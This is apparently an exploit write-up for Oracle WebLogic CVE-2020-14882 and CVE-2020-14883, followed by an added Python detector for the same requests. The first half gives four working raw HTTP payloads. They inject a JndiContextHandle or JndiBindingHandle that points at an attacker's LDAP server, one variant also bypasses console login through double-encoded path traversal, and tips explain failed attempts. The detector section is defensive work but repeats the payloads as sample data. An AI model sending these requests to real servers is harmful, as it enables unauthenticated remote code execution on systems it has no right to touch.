Method one: console.portal

Tested successfully on Windows against WebLogic 10.3.6 and 12.1.3.0.

The payload below requires logging in to the admin console first; the resulting ADMINCONSOLESESSION cookie is then reused in the attack request.

```http
GET /console/console.portal?_nfpb=true&_pageLabel=EJBTestHomePage&EJBTestHomePagehandle=com.bea.console.handles.JndiContextHandle("ldap://192.168.145.172:1389/Basic/Command/dir;AdminServer")&returnTo=home HTTP/1.1
Host: 192.168.145.169:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.145.156:7001/console/login/LoginForm.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=1KjbhdvfqqyJzch6km6DxJpfnh8tZSTg4nSm5j6QqL2qLT9P14HC!1928727074
Connection: close
```
The following combines it with CVE-2020-14882, the console authentication bypass: a double-encoded `..` (`%252e%252e`) under a static path such as `/console/images/` gets past the console's access check, so the same handle injection works without logging in. The handle injection itself is tracked as CVE-2020-14883.
```http
GET /console/images/%252e%252e/console.portal?_nfpb=true&_pageLabel=EJBTestHomePage&EJBTestHomePagehandle=com.bea.console.handles.JndiContextHandle("ldap://192.168.145.172:1389/Basic/Command/dir;AdminServer")&returnTo=home HTTP/1.1
Host: 192.168.145.169:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

Method two: consolejndi.portal

Note: the **ldap** URL in this payload has a semicolon in the middle of the address (`192.168.174;1`), so an ldap link cannot simply be pasted in unchanged.

Likewise, this payload requires logging in to the console before attacking:
```http
GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.174;1:1088/Exploit;AdminServer%22) HTTP/1.1
Host: 192.168.174.144:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=GZUoX_MV8_7OMiv-hhhzix8-zbfknZI4Prm_41N4vUPBEt1vP8mf!2017534379; Hm_lvt_eaa57ca47dacb4ad4f5a257001a3457c=1605675257,1605704689,1605871061,1606205262; JSESSIONID=6qYoDKwKLN2nLGhJiJ1CtcaxZ8ENfjTU7B2n0GmG5HTVDrJxPkg3!655738588
Connection: close
```
Combined with CVE-2020-14882 for unauthenticated access. Here the traversal is encoded one level deeper than in method one: every character of `%2e%2e%2f` is percent-encoded again, so `%25%32%65%25%32%65%25%32%66` decodes to `%2e%2e%2f` and then to `../`.
```http
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.145;172:1389/Basic/Command/dir;AdminServer%22) HTTP/1.1
Host: 192.168.145.146:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
Note: if the JNDI server receives the request but exploitation still fails, the target's JDK is probably too new: from 8u191, 7u201, 6u211 and 11.0.1 onward, `com.sun.jndi.ldap.object.trustURLCodebase` defaults to false, so the remote codebase referenced by the LDAP response is not loaded. If sending the exploit produces no reaction at all, the target most likely has no outbound network access.
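From the defender's side, the four requests above (both methods, authenticated and unauthenticated) share a small set of indicators: a console `.portal` endpoint reached through a percent-encoded `..`, a `JndiContextHandle` or `JndiBindingHandle` argument in the query, a remote naming-service scheme inside that argument, and the presence or absence of an ADMINCONSOLESESSION cookie. The following detector is an added example, not code from the original page or from any WebLogic tooling: it parses a raw request in the page's format, undoes the double encoding, and extracts those indicators. The `recover_callback` helper embodies one assumption inferred from this page's payloads rather than any documented format: the semicolon inside the ldap host (`192.168.174;1`, `192.168.145;172`) stands for the last dot of the callback IP, so it is turned back into a dot to recover the attacker's LDAP address. The sample requests are constructed from the ones on this page with headers trimmed; the benign `HomePage1` request is constructed as a control.

```python
"""Detect WebLogic console JNDI-handle abuse in raw HTTP requests.

Added example (not part of the original page): parses a raw request in the
format shown above, undoes the double URL encoding of the CVE-2020-14882
traversal, and reports whether the query carries a JndiContextHandle or
JndiBindingHandle argument that points at a remote naming service.
"""
import re
from urllib.parse import unquote, urlsplit

HANDLE_RE = re.compile(
    r'com\.bea\.console\.handles\.(JndiContextHandle|JndiBindingHandle)'
    r'\(\s*"?([^")]*)"?\s*\)'
)
REMOTE_SCHEMES = ("ldap://", "ldaps://", "rmi://", "iiop://")


def full_decode(text, max_rounds=4):
    """Percent-decode until the value stops changing (%252e -> %2e -> '.')."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def normalize_path(path):
    """Collapse '.' and '..' segments to reveal the servlet path actually hit."""
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def recover_callback(handle_arg):
    """Drop the trailing ';<server>' token and rebuild the JNDI URL.

    Assumption inferred from this page's payloads (192.168.174;1 and
    192.168.145;172): a ';' inside the host part stands for the last dot of
    the callback IP. This is not a documented handle format.
    """
    jndi_url = handle_arg.rsplit(";", 1)[0] if ";" in handle_arg else handle_arg
    scheme, _, rest = jndi_url.partition("://")
    authority, slash, path = rest.partition("/")
    return f"{scheme}://{authority.replace(';', '.')}{slash}{path}"


def parse_raw_request(raw):
    """Split 'METHOD target HTTP/x' plus header lines into its parts."""
    lines = [line for line in raw.strip().splitlines() if line.strip()]
    method, target, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def analyze_request(raw):
    """Return the indicators a detection rule would key on for one request."""
    _method, target, headers = parse_raw_request(raw)
    parts = urlsplit(target)
    once = unquote(parts.path)
    decoded_path = full_decode(parts.path)
    finding = {
        "effective_path": normalize_path(decoded_path),
        "traversal": ".." in decoded_path.split("/"),
        # needed a second decoding round: the 14882 bypass signature
        "double_encoded": once != parts.path and full_decode(once) != once,
        "console_session": "ADMINCONSOLESESSION" in headers.get("cookie", ""),
        "handle": None,
        "callback": None,
        "remote_jndi": False,
    }
    match = HANDLE_RE.search(full_decode(parts.query))
    if match:
        handle_cls, arg = match.groups()
        finding["handle"] = handle_cls
        finding["remote_jndi"] = arg.lower().startswith(REMOTE_SCHEMES)
        if finding["remote_jndi"]:
            finding["callback"] = recover_callback(arg)
    finding["unauthenticated"] = finding["traversal"] and not finding["console_session"]
    finding["alert"] = finding["remote_jndi"]
    return finding


# Sample requests constructed from the ones on this page (headers trimmed).
AUTHENTICATED_CONSOLE_PORTAL = """GET /console/console.portal?_nfpb=true&_pageLabel=EJBTestHomePage&EJBTestHomePagehandle=com.bea.console.handles.JndiContextHandle("ldap://192.168.145.172:1389/Basic/Command/dir;AdminServer")&returnTo=home HTTP/1.1
Host: 192.168.145.169:7001
Cookie: ADMINCONSOLESESSION=1KjbhdvfqqyJzch6km6DxJpfnh8tZSTg4nSm5j6QqL2qLT9P14HC!1928727074
"""
UNAUTHENTICATED_CONSOLE_PORTAL = """GET /console/images/%252e%252e/console.portal?_nfpb=true&_pageLabel=EJBTestHomePage&EJBTestHomePagehandle=com.bea.console.handles.JndiContextHandle("ldap://192.168.145.172:1389/Basic/Command/dir;AdminServer")&returnTo=home HTTP/1.1
Host: 192.168.145.169:7001
"""
UNAUTHENTICATED_CONSOLEJNDI = """GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.145;172:1389/Basic/Command/dir;AdminServer%22) HTTP/1.1
Host: 192.168.145.146:7001
"""
# Constructed control: an ordinary console page load with no handle argument.
BENIGN_CONSOLE_PAGE = """GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1
Host: 192.168.145.169:7001
Cookie: ADMINCONSOLESESSION=1KjbhdvfqqyJzch6km6DxJpfnh8tZSTg4nSm5j6QqL2qLT9P14HC!1928727074
"""

if __name__ == "__main__":
    for name in ("AUTHENTICATED_CONSOLE_PORTAL", "UNAUTHENTICATED_CONSOLE_PORTAL",
                 "UNAUTHENTICATED_CONSOLEJNDI", "BENIGN_CONSOLE_PAGE"):
        print(name, analyze_request(globals()[name]))
```

Run it as a script to see the findings for all four sample requests. Keying the alert on the handle argument rather than on the traversal alone matters: the traversal indicator alone also fires on the 14882 bypass used with other console pages, while a remote scheme inside a `Jndi*Handle` argument is the part specific to these two methods, and it still fires on the authenticated variants where no traversal is present.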